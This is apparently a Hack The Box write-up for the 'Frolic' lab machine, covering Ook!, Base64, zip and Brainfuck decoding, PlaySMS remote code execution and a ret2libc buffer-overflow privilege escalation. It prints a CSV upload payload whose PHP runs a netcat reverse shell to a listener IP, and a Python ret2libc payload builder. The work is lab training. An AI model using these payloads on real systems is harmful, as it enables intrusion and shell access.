Hack the Box Frolic
Updated: Dec 5, 2020
Frolic was a box with few open ports. After finding credentials for the PlaySMS directory, which first required identifying and decoding several esoteric languages, it provided a straightforward path with multiple options for remote code execution. The privilege escalation was a buffer overflow in an SUID binary that we exploited with a ret2libc (return-to-libc) attack.
Directory brute-force over HTTP port 9999
Find and decode a series of strings from the discovered directories
Log in to the PlaySMS page
Exploit PlaySMS with a CSV upload to get RCE
Locate the rop binary with SUID permissions
Enumerate it and craft a payload
GDB and Python exploit development
Do not be afraid of ROP binary exploits; they are more straightforward than they first appear.
There is nothing wrong with retracing your steps or restarting the machine.
As always we start off with simple enumeration.
This is common on easy-rated Hack The Box machines; quite often the SMB service allows an anonymous bind with smbclient, which is built into Kali Linux.
Port 9999 HTTP
Visiting the server over HTTP on port 9999 gives a connection error.
Checking for directories with OWASP DirBuster turns up many directories.
We start checking them all, with the dev page up first.
/dev gives a broken page, so it is on to the next.
The /admin page gives us a potential entry point.
An admin login page is common on Hack The Box, especially on easy machines, and it usually represents a way in. So let us make a note of this and check back if we come across credentials later.
I spent time reviewing every line of this page and fell down a few rabbit holes before recalibrating my efforts.
At this point I had been through all the directories with an initial look and found nothing of value. Generally speaking, on a Hack The Box machine you can be sure that if only a few ports are open, those ports, including the web directories identified on them, are where we have to focus.
Finally I checked the source code of the admin login page and located credentials that allowed me to log in.
Unfortunately, we were then presented with this unusual pattern of characters.
Although I had no idea what this was initially, some research on the character set revealed that we were dealing with an esoteric language known as Ook!. Armed with this information we can decode the Ook! with the decode fr tool.
With this secret we are moving closer to the finish line.
Do the obvious
Browsing to this odd directory gives us another cryptic page with what appears to be Base64 encoding.
I was in for a surprise when I decoded the information and received garbled text. Dismissing this garbled text sent me down a rabbit hole before I returned for a closer analysis of the garbled characters. Upon further inspection I realised we may have been looking at raw binary data: the Base64 was encoding a file, not text. So I proceeded to rebuild the original data with the native Linux base64 utility.
Doing so gave me an error saying the input was invalid. After reviewing the Base64 text I noticed spaces between the characters. Removing the spaces let the Base64 decode, and running file on the output shows that it is indeed a zip file.
Upon trying to unzip it, I was not able to extract the files without a password. At first I stared blankly at the screen as I mentally retraced my steps and considered all the possible clues along the way. Then I tried the password "password" and it worked :). I can confidently say that this never happens on Hack The Box machines, so I was lucky.
We can see the file deflated into index.php, which we had seen in the initial Base64 when we first attempted to decode it. Looking inside index.php yields hex.
Converting the hex to text gives us Base64, and decoding that gives us Brainfuck. Using decode fr we are able to decode this and receive a suggested password.
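The whole decoding chain from the admin page to the suggested password, reproduced offline as an added Python example that is not part of the original writeup. It includes an Ook! to Brainfuck translator and a small Brainfuck interpreter (so no online decoder is needed), then walks the Base64-with-spaces -> zip -> index.php -> hex -> Base64 -> Brainfuck chain. Every input below is constructed for the example, not the box's real data; the in-memory zip is unencrypted because the standard library cannot write password-protected archives, but the extraction step passes the password the same way you would for the real one.

```python
import base64
import binascii
import io
import zipfile

# Ook! is Brainfuck with each command spelled as a pair of Ook tokens.
OOK_TO_BF = {
    ("Ook.", "Ook?"): ">", ("Ook?", "Ook."): "<",
    ("Ook.", "Ook."): "+", ("Ook!", "Ook!"): "-",
    ("Ook!", "Ook."): ".", ("Ook.", "Ook!"): ",",
    ("Ook!", "Ook?"): "[", ("Ook?", "Ook!"): "]",
}
BF_TO_OOK = {v: k for k, v in OOK_TO_BF.items()}


def ook_to_brainfuck(text: str) -> str:
    """Translate Ook! to Brainfuck; tokens that form no known pair are dropped."""
    toks = text.split()
    return "".join(OOK_TO_BF.get(p, "") for p in zip(toks[0::2], toks[1::2]))


def brainfuck_to_ook(prog: str) -> str:
    return " ".join(" ".join(BF_TO_OOK[c]) for c in prog if c in BF_TO_OOK)


def run_brainfuck(prog: str, max_steps: int = 1_000_000) -> str:
    """Minimal interpreter: 8-bit wrapping cells, no input, and a step cap so a
    malformed or hostile blob cannot hang the decoder."""
    jump, stack = {}, []                      # precompute bracket matches
    for i, c in enumerate(prog):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']' at offset %d" % i)
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out, steps = [0] * 30000, 0, 0, bytearray(), 0
    while pc < len(prog):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = prog[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


def rebuild_base64(text: str) -> bytes:
    """Strip the whitespace that made `base64 -d` reject the blob, then decode
    strictly so a corrupted blob fails loudly instead of silently truncating."""
    return base64.b64decode("".join(text.split()), validate=True)


def is_zip(data: bytes) -> bool:
    return data[:2] == b"PK"                  # the same magic `file` keys on


def extract_index_php(zip_bytes: bytes, password) -> bytes:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read("index.php", pwd=password)


def hex_b64_to_brainfuck(payload: str) -> str:
    """index.php held hex; unhex -> Base64 text -> Brainfuck source."""
    b64 = binascii.unhexlify("".join(payload.split()))
    return base64.b64decode(b64, validate=True).decode("ascii")


def decode_chain(b64_with_spaces: str, password=b"password") -> str:
    data = rebuild_base64(b64_with_spaces)
    if not is_zip(data):
        raise ValueError("decoded data is not a zip archive")
    php = extract_index_php(data, password).decode("ascii")
    return run_brainfuck(hex_b64_to_brainfuck(php))


# --- constructed sample data (not the real box content) ---
BF_HI = "++++++++[>+++++++++<-]>." + "+" * 33 + "."   # prints "Hi"
OOK_HI = brainfuck_to_ook(BF_HI)


def build_sample_blob() -> str:
    """Zip containing index.php (hex of Base64 of BF_HI), then Base64 with a
    space every four characters to mimic the page's broken copy."""
    hex_blob = binascii.hexlify(base64.b64encode(BF_HI.encode())).decode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.php", hex_blob)
    b64 = base64.b64encode(buf.getvalue()).decode()
    return " ".join(b64[i:i + 4] for i in range(0, len(b64), 4))


if __name__ == "__main__":
    print(run_brainfuck(ook_to_brainfuck(OOK_HI)))
    print(decode_chain(build_sample_blob()))
```

The strict `validate=True` and the `PK` check are the two places where the box's blob would have tripped you up: the first rejects the stray spaces instead of guessing, and the second tells you it is a file rather than text before you waste time on the "garbled" output.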
Back to square #1
At this point I was at a loss and started my process from scratch. Interestingly enough, while reviewing all the directories from the DirBuster results, the /dev/backup folder actually loaded with some text this time. This was odd, as the first time it had just shown as a broken page.
We find the suggested /playsms page and log in with the previous password and the username admin. Although we can exploit this site by manually uploading code, I launched the exploit from Metasploit instead, but will include both ways of gaining remote code execution in this guide.
Remote code execution - Metasploit
Loading up Metasploit and searching for known PlaySMS exploits gave me three options.
It was number 3 of the bunch that finally worked.
Remote code execution - manual
The second way is to log in to the web page and upload a text file with the .csv extension containing the following code, which you can find by researching CSV reverse shell payloads. The first line is the CSV header and the second is the data row; the PHP placed in the Name field is executed server-side when PlaySMS processes the import (replace 10.10.14.33 and 6363 with your listener's IP and port):
Name,Mobile,Email,Group code,Tags
<?php $t="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.33 6363 >/tmp/f"; system($t); ?>,12,344,56,67
From here we capture the flag.
I uploaded a Linux enumeration script and it pointed out several SUID files; one in particular stood out, the "rop" file. If you do not know, ROP stands for return-oriented programming. I downloaded the file and proceeded to investigate.
When it comes to a ROP exploit, I know from experience that the goal is to get the binary to execute /bin/sh and pop a shell.
I am not going to dive into how binary exploitation works, just give a quick summary of solving this rop challenge.
We review the binary in GDB after setting a breakpoint and retrieve the memory addresses of system, exit, the libc base and the "/bin/sh" string inside libc. These addresses are only usable outside the debugger if they stay constant between runs, i.e. ASLR is disabled on the target or the libc base can otherwise be determined, so check /proc/sys/kernel/randomize_va_space before relying on them.
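The classic 32-bit ret2libc frame those addresses feed into, as an added Python example that is not the writeup's exploit. Every number in it is a hypothetical placeholder: substitute the padding offset you found (for example with a cyclic pattern) and the libc base, system, exit and "/bin/sh" addresses GDB shows you on the target. It assumes an i386 binary that takes the payload through argv, which is why it refuses a chain containing NUL bytes.

```python
import struct

# Hypothetical placeholders for illustration only; take the real values from
# GDB on the target (`info proc mappings` or `vmmap` for the libc base,
# `p system`, `p exit`, and a `find` for the "/bin/sh" string).
OFFSET_TO_EIP = 52          # assumed padding before the saved return address
LIBC_BASE = 0xb7e00000      # assumed libc base as seen under GDB
SYSTEM_OFF = 0x0003ada0     # assumed offsets of the symbols within libc
EXIT_OFF = 0x0002e9d0
BINSH_OFF = 0x0015ba0b


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian pointer (i386)."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit address: %#x" % value)
    return struct.pack("<I", value)


def libc_addresses(base: int) -> dict:
    """Rebase the symbol offsets on the libc base observed for this run."""
    return {"system": base + SYSTEM_OFF, "exit": base + EXIT_OFF,
            "binsh": base + BINSH_OFF}


def build_ret2libc(offset: int, system: int, exit_addr: int, binsh: int) -> bytes:
    """padding | &system | &exit | &"/bin/sh"

    When the overflowed function executes `ret`, EIP becomes &system. system()
    then sees &exit as its own return address and &"/bin/sh" as its first
    argument, so a shell pops and the process exits cleanly afterwards."""
    return b"A" * offset + p32(system) + p32(exit_addr) + p32(binsh)


def nul_positions(chain: bytes) -> list:
    """Offsets of NUL bytes inside the chain. A payload delivered through argv
    or strcpy() is truncated at the first NUL, so any hit here means that
    address is unusable on this delivery path."""
    return [i for i, b in enumerate(chain) if b == 0]


def make_payload(base: int = LIBC_BASE, offset: int = OFFSET_TO_EIP) -> bytes:
    a = libc_addresses(base)
    payload = build_ret2libc(offset, a["system"], a["exit"], a["binsh"])
    bad = nul_positions(payload[offset:])
    if bad:
        raise ValueError("NUL byte(s) in chain at %r; pick other addresses" % bad)
    return payload


if __name__ == "__main__":
    import sys
    # Usage on the target: ./rop "$(python3 ret2libc.py)"
    sys.stdout.buffer.write(make_payload())
```

Keeping the offsets separate from the base is what makes the script reusable: if the base you observe under GDB differs from the real run, only `LIBC_BASE` changes, not the three symbol offsets, and the NUL check tells you immediately whether a chosen libc base produces an address that argv would cut short.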
Now we receive the flag and complete the machine :)